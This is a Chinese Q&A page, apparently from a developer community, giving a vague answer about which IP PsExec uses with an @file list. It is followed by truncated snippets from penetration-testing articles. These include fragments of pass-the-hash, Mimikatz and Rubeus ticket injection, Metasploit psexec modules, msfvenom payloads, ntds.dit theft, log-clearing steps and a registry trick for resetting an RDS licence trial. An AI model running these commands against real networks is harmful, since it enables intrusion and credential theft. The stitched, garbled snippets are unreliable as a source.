在@file psexec中使用了哪个IP

是一个具体的问题，需要根据具体的上下文和使用场景来确定。一般来说，psexec是一款用于远程执行命令的工具，常用于Windows系统。在使用psexec时，可以指定目标主机的IP地址或主机名来进行远程操作。

如果在问答内容中提到了具体的IP地址，那么在@file psexec中使用的就是该IP地址。这个IP地址可以是目标主机的IP地址，用于指定远程执行命令的目标主机。

如果在问答内容中没有提到具体的IP地址，那么在@file psexec中使用的IP地址需要根据具体的使用场景来确定。一种可能的情况是，在psexec的命令中没有指定IP地址，而是通过主机名进行远程操作。在这种情况下，psexec会使用DNS解析来获取目标主机的IP地址。

总之，在使用@file psexec时，具体使用的IP地址取决于上下文和使用场景，可以是目标主机的IP地址或主机名。

相关·内容

Netty在Dubbo中使用了哪些Handler

1.0.0" /> Spring在启动的过程中...在Spring创建完所有的Bean之后,最后会发布一个ContextRefreshedEvent事件....并不是如上图, 在AllChannelHandler中有个executor属性,它是一个线程池....是由另一类线程执行的, 是由AllChannelHandler中的线程池执行的, 名称类似DubboServerHandler-2.0.1.15:20880-thread-57 也就是说, Netty的IO线程在接收到请求后...protocol name="dubbo" port="20880" threads="200" threadpool="fixed" /> 使用threads=200, threadpool=fixed 就是在配置图中红色区域的线程池

3911 0

域渗透 | Kerberos攻击速查表

中使用Rubeus： ....中使用ticket：使用Mimikatz注入ticket： mimikatz # kerberos::ptt 使用Rubeus注入ticket： ....\Rubeus.exe ptt /ticket: 使用PsExec在远程计算机中执行cmd ： ....\Rubeus.exe ptt /ticket: 使用PsExec在远程计算机中执行cmd ： ....\Rubeus.exe ptt /ticket: 使用PsExec在远程计算机中执行cmd ： .

1.9K2 0

横向移动

,文件上传/下载等.在同一时间内,两个ip之间允许建立一个连接....tasklit /S 192.168.10.1 /U administrator /P Admin@123 //列出DC上运行的进程 /S 指定IP地址 /U 指定哪个用户执行这个命令 /P...使用wmic远程执行命令，需要在目标机器开启WMI服务(需要开放135端口,wmic会以管理员权限在远程系统中执行命令) 查看目标机器进程信息 wmic /node:[IP] /user:[username...python wmiexec.py -hashes [LM Hash]:[NT Hash] [username]@[IP] wmiexec.vbs 通过vbs脚本来调用WMI来模拟PsExec功能....在打补丁后，常规的PTH已无法成功，唯独SID为500的用户除外，利用这个用户仍可以通过PTH来远程ipc连接如果禁用了NTLM认证，PsExec无法利用获得的NTLM Hash进行远程连接，可通过Mimikatz

2.3K6 0

从WebShell到域控实战详解

提升权限上传免杀的Payload到机器名为PAVMSEF21、IP为10.51.0.21的服务器上，然后在“中国菜刀”或者WebShell下运行，如图所示。 ?...通常，在渗透过程中很有可能只获得了一个系统的Guest或User权限。...4.使用Metasploit下的psexec， psexec_psh；Impacket psexec；pth-winexe；Empire Invoke-Psexec等PsExec类工具反弹shell。...这里使用了Metasploit自带的dumphash模块。需要注意：要想使用此模块导出Hash，必须要有SYSTEM的权限才行，具体操作如图所示。 ? 七....— 删除所有在渗透过程中使用过的工具。 — 删除应用程序、系统和安全日志。 — 关闭所有的Meterpreter连接。 ? ? ?

1.4K3 0

专题 | Python编写渗透工具学习笔记二

首先，它利用了Windows 服务器中一个服务的0day 漏洞。利用这个栈溢出漏洞，蠕虫能在被感染的主机上执行shellcode 并下载蠕虫。...所以下面我们要编写一个confickerExploit()函数，就是用来实现写入生成漏洞利用代码的一些信息到rc脚本的功能的，例如目标主机、本地地址和端口等，该函数还把指定使用哪个漏洞利用代码的指令也写进...值得注意的是，在confickerExploit()函数中，脚本发送了一条指令在同一个任务（job）的上下文环境中（-j），不与任务进行即时交互的条件下（-z）利用对目标主机上的漏洞。...因此，我们的脚本还需要另一种也在Conficker 蠕虫中使用过的攻击方法。它需要用暴力攻击的方式破解SMB 用户名/密码，以此获取权限在目标主机上远程执行一个进程（psexec）。...对文件中的每个密码，函数都会生成一个用来远程执行（psexec）进程的Metasploit 脚本。

2K11 2

从WebShell到域控实战详解

1.8K1 0

Quantum Ransomware

WMI和PsExec部署Quantum Ransomware之前首先使用了CS和RDP来进行横向移动，这一案例仅用了3小时44分钟的极短时间(TTR) 时间序列初始访问攻击者通过常见的恶意软件...PsExec被用来实现勒索软件的执行，攻击者利用PsExec中的"-r"选项来定义自定义名称(分布式事务管理)在目标主机上创建的远程服务(默认情况下是PSEXESVC) WMI 在整个入侵过程中我们还观察到攻击者使用...>\c$\windows\temp\ 之后攻击者利用PsExec中的"-r"选项来定义在目标主机上创建的远程服务的自定义名称("mstdc")(默认为PSEXESVC) psexec.exe \\<IP...PsExec时在目标端点上创建 WMI 攻击者采用的另一种执行方法是WMI调用，以在目标主机上启动远程进程 wmic /node:"" /user:"\Administrator...当用户点击LNK文件时IcedID DLL就会被执行在执行IcedID DLL时我们发现在这个过程中使用了内置的Windows实用程序(例如:ipconfig、systeminfo、nltest、net

1.6K1 0

如何批量在多台服务器上执行命令

在一些场景里，我们可能需要同时在多台服务器上执行命令，如果一台台登录服务器执行嘛，这效率未免太低了。有没有什么比较简单的方式，可以实现批量在多台服务器上执行命令呢。...场景2：Windows服务器批量执行命令在Windows中有很多种方式可以实现横向移动，通过系统自带命令或工具可以实现。但如果我们需要在多台服务器上执行命令，有没有一种比较简洁的方式？...PsExec一行命令就可以实现： PsExec.exe @file -u administrator -p xxxx -s -i -c 1.bat 如上，PsExec将在file文件中列出的每台计算机上执行.../bin/bash cat iplist|while read line #iplist文件中存放了IP地址和密码，每行格式为“IP地址密码” do a=($line)...exp_continue} "*password:" { send "${a[1]}\r" } } expect "#" send "whoami\r" send "ip

4.3K4 0

通过Webshell远程导出域控ntds.dit的方法

在渗透测试期间我也面临了同样的问题（没有公网IP服务器）。...为了实现上述任务，我们将使用“psexec.exe”，如果我们使用“elevated”选项（通过指定-h）指定目标计算机IP、域管理员用户名及其密码，则可以在远程Windows计算机上执行命令。...我们需要通过web shell在Windows机器“LABONE”上上传psexec.exe。从Web shell我们将使用“vssadmin”命令指定AD域控机器IP，域管理员用户名及其密码。...这个任务可以通过使用“psexec”来完成，我们只需在“copy”命令中指定目标AD域控机器的IP，域管理员用户名和密码即可，请使用SMB将ndts.dit和SYSTEM文件从卷影副本复制到LABONE...使用“psexec”在远程主机上执行命令的常规用法： psexec.exe \\remote_IP -u user_name -p password_of_the_user -h cmd /c "command_which_we_want_to_execute

1.4K1 0

由浅入深的域渗透系列一（下）

set lhost 192.168.33.3 msf exploit(handler) > set lport 6666 msf exploit(handler) > exploit -j 之后在cs...with syntax 'file:' RPORT 445 yes The SMB service port...ip RHOSTS => 192.168.52.138 msf5 auxiliary(admin/smb/psexec_command) > set SMBDOMAIN...[*] 192.168.52.138:445 - Output for "ipconfig": Windows IP �� :...在利用ms14-068漏洞之前，建议先使用 klist/purge 清除服务器端缓存的 Kerberos 凭据，且使用域控地址不使用IP. .获取域用户的SID SID（安全标识符），是为域或本地计算机中创建每个帐户所分配的唯一

1.7K2 0

ATT&CK视角下的红蓝对抗:二十一.横向移动之利用Psexec进行横向渗透

一.前言Psexec最早由Mark Russinovich创建并发布在Sysinternals Suite上，Sysinternals Suite是微软发布的工具程序集。...我们使用Psexec，可以通过SMB协议在远程主机上运行命令，我们无须在远程主机上面安装任何客户端程序就可以远程管理，并且可以获得一个强交互的命令控制台。...进行横向渗透三.利用Psexec进行横向渗透 Psexec最早由Mark Russinovich创建并发布在Sysinternals Suite上，Sysinternals Suite是微软发布的工具程序集...表1-1 利用Psexec创建远程服务进行横向渗透实验环境主机服务类型IP地址Kali 2022攻击机10.10.10.2Windows 2012 R2跳板机192.168.1.2、172.16.224.140Windows...在跳板机中使用net use \\192.168.1.3\IPC$ "Password@123" /user:"Administrator"命令，建立与靶标机器的IPC$连接，命令执行结果如图1-4所示

4511 0

内网渗透｜谈谈HASH传递那些世人皆知的事

：可以是单个IP也可以是IP段•-u：指定用户名•-H：指定NTLM Hash•-d：指定域•-x：执行系统命令如下图所示，成功在 DC 主机上执行命令： image-20210711123730400..."命令" 使用 Metasploit 进行 PTH 经常使用的三个模块： auxiliary/admin/smb/psexec_command // 在目标机器上执行系统命令...exploit/windows/smb/psexec // 用psexec执行系统命令 exploit/windows/smb/psexec_psh...-ActionPut-Source file.exe -Destination \\server\share\subdirectory\file.exe # 向远程主机的共享目录中上传指定的文件...2012 R2默认支持该功能•Windows 7和Windows Server 2008 R2默认不支持，需要安装补丁2871997、2973351 Windows Server 2012 R2 采用了新版的

1.6K2 0

记一次内网渗透靶场学习

环境搭建 web：外网ip - 192.168.10.80 内网ip - 10.10.10.80 PC：外网ip - 192.168.10.201 内网ip - 10.10.10.201 DC：内网...20210707194612575.png] 执行一下，这里因为有360的原因使用msf的原生马是不能够上线的，会被360拦截 [image-20210707194842917.png] 这里我后面使用了一下混淆进行了初步免杀处理...getuid查看了一下当前的权限发现还只是一个user权限，也使用不了mimikatz，因为在cs上提权比较方便，这里就直接msf派生个对话给cs，在cs上进行提权操作使用payload-inject...操作 [image-20210707222133082.png] 这里psexec执行了但是没有主机上线，这里想起来psexec是需要在防火墙关闭的情况下才能够进行pth的，所以这里尝试一下先ipc连接关闭防火墙后再进行...这里使用到金票进行权限维持首先hashdump出krbtgt的hash值 [image-20210707224414333.png] 查看一下SID [image-20210707224512621.png] 在web

6323 0

记一次内网渗透靶场学习

5060 0

reset 远程多用户多会话120天免费试用

Get-WindowsFeature -name rds-rd-server,*rds-licensing*|Install-WindowsFeature 但是免费120天后就用不了了，此时临时恢复远程： mstsc /v:IP...Control\Terminal Server\RCM下面的子目录GracePeriod powershell -command "wget http://live.sysinternals.com/PsExec.exe...-Outfile c:\windows\psexec.exe" psexec -accepteula -nobanner -i -d -s reg delete "HKLM\SYSTEM\CurrentControlSet...Start-Service TermService" powershell -command "Start-Service TermServLicensing" 完成以上步骤后就reset 120天免费试用了...，在server2012r2上验证ok，server2016/2019/2022我没有验证

6194 0

记一次内网渗透靶场学习

环境搭建 web：外网ip - 192.168.10.80 内网ip - 10.10.10.80 PC：外网ip - 192.168.10.201 内网ip - 10.10.10.201 DC：内网...192.168.10.30 lport=4444 -f exe > msf.exe 使用冰蝎上传到靶机上执行一下，这里因为有360的原因使用msf的原生马是不能够上线的，会被360拦截这里我后面使用了一下混淆进行了初步免杀处理...getuid查看了一下当前的权限发现还只是一个user权限，也使用不了mimikatz，因为在cs上提权比较方便，这里就直接msf派生个对话给cs，在cs上进行提权操作使用payload-inject...进行hash传递横向移动横向移动这里首先扫描一下网段下的主机和基本判断的一致，内网下有3台主机这里使用80主机进行psexec操作这里psexec执行了但是没有主机上线，这里想起来psexec...进行psexec 即可上线DC 这里因为拿到了域管的帐号，这里也使用psexec的方式上线cs，这里当时可以使用批量pth进行上线上线成功权限维持这里使用到金票进行权限维持首先hashdump

3001 0

内网渗透测试：内网横向移动基础总结

（可能有点慢） /s：指要查看的远程系统的IP地址 /u：指定使用哪个用户执行这个远程命令 /p：指定该用户的密码 tasklist /S 192.168.183.130 /U administrator...模块在metasploit框架下，有以下这几个psexec模块：常用的模块有： exploit/windows/smb/psexec // 用psexec执行系统命令,与psexec.exe.../psexec_command // 在目标机器上执行系统命令exploit/windows/smb/ms17_010_psexec 使用exploit/windows/smb/psexec_psh...注意：在使用psexec执行远程命令时，会在目标系统中创建一个psexec服务。命令执行后，psexec服务将会被自动删除。...Windows域中使用kerberos协议过程中，为了让服务器判断Client是否有权限访问服务，微软在Windows平台上对Kerberos协议进行了一些扩充，即在协议中增加了PAC（Privilege

3.1K1 0

红日靶场（一）vulnstack1 渗透分析

要想使得该语句导出成功，则需要在Mysql文件夹下修改my.ini 文件，在mysqld内加入secure_file_priv =""。...OWA smbjump psexec root-tvi862ubeh smb三台主机全部上线图片选择psexec横向移动图片网络拓扑图如下图片VPN部署图片sudo ifconfig phear0 192.168.10.0...|hash传递在 Metasploit 中，经常使用于哈希传递攻击的模块有：auxiliary/admin/smb/psexec_command #在目标机器上执行系统命令exploit/windows.../smb/psexec #用psexec执行系统命令exploit/windows/smb/psexec_psh #使用powershell作为payload探测445use...数据包--disable-arp-ping或--send-ip 对于本地以太网上的主机不进行ARP扫描，而是IP地址扫描，默认是ARP--discovery-ignore-rst 不理RST回复，有时防火墙会欺骗

7562 0

威胁狩猎系列文章之一到三

注意：基于 Netflow 数据和授权/合法 RDP 子网的检测仍然相关如果您希望在不必从许多成员服务器和端点收集登录事件的情况下确定 RDP 活动的基线，那么这是正确的做法。...IPC $ SMB 共享暴露给 winreg 命名管道的连接） 2、NetSessionEnum API 的跟踪（通过 IPC $ SMB 共享暴露给 srvsvc 命名管道的连接） 3、所有源帐户，源IP...检测逻辑：在{winreg，srvsvc}中使用 RelativeTargetName 查找事件 5145 的两次出现(查找 1 分钟内，相同的 [SourceP，Account Name，SourcePort...PsExec 最强大的用途包括在远程系统上启动交互式命令提示和 IpConfig 等远程启用工具（查看原本无法获取的有关远程系统的信息）。...幸运的是，我们在 5145 事件中仍然有（现在）一个唯一的字符串，我们可以用它来检测 PSEXEC（“stdin”，“stdout”和“stderr”）检测逻辑： [EventID = 5145 且

1.7K3 0

实战打靶 - 巧用smb拿下不出网主机

(2) 在cs中使用psexec进行横向移动，选择现有的beacon作为跳板，这里凭据必须是administrator，即拥有目标主机管理员权限 ?...msf在单兵作战的时候还是很稳定很香的。...ms_17_010模块总结漏洞检测方法：设置一下目标ip和线程即可，这里因为已经扫出存在漏洞的机器了，所以就没有进行漏洞检测。...WMI获取域控服务器因为之前用了两个ms_17_010的模块都没有打成功，而session放在后台是后面才想到的打法，在当时模块没有打成功的情况下我决定另辟蹊径首先我打开3389端口并关闭防火墙进到...在win7上看一下，上传成功 ?

1.3K4 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

在@file psexec中使用了哪个IP

相关·内容

Netty在Dubbo中使用了哪些Handler

域渗透 | Kerberos攻击速查表

横向移动

从WebShell到域控实战详解

专题 | Python编写渗透工具学习笔记二

从WebShell到域控实战详解

Quantum Ransomware

如何批量在多台服务器上执行命令

通过Webshell远程导出域控ntds.dit的方法

由浅入深的域渗透系列一（下）

ATT&CK视角下的红蓝对抗:二十一.横向移动之利用Psexec进行横向渗透

内网渗透｜谈谈HASH传递那些世人皆知的事

记一次内网渗透靶场学习

记一次内网渗透靶场学习

reset 远程多用户多会话120天免费试用

记一次内网渗透靶场学习

内网渗透测试：内网横向移动基础总结

红日靶场（一）vulnstack1 渗透分析

威胁狩猎系列文章之一到三

实战打靶 - 巧用smb拿下不出网主机

扫码

相关资讯

热门标签

活动推荐

运营活动

社区

活动

资源

关于

腾讯云开发者

热门产品

热门推荐

更多推荐